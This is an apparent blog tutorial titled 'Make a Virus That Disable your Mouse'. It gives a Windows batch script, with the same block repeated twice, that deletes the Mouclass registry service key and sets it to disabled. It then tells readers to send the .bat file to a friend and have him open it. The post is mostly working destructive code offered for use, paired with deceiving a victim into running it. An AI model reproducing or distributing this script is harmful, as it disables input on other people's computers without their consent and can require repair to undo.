Make a Virus That Disable your Mouse
Today, We are going to create a Virus that Disable your Mouse.
Prerequisite
1. A Computer.
2. Notepad
Steps to Create Virus
1. Go to Start Menu.
2. Open Notepad.
3. Just Copy and Paste the Code
___________Code___________
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem --------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem --------------------------------
4. Save the File with ".bat" Extension.
5. Send this File to your Friend & Tell him to Open The file. His Mouse will not work after Opening the File.
No comments:
Post a Comment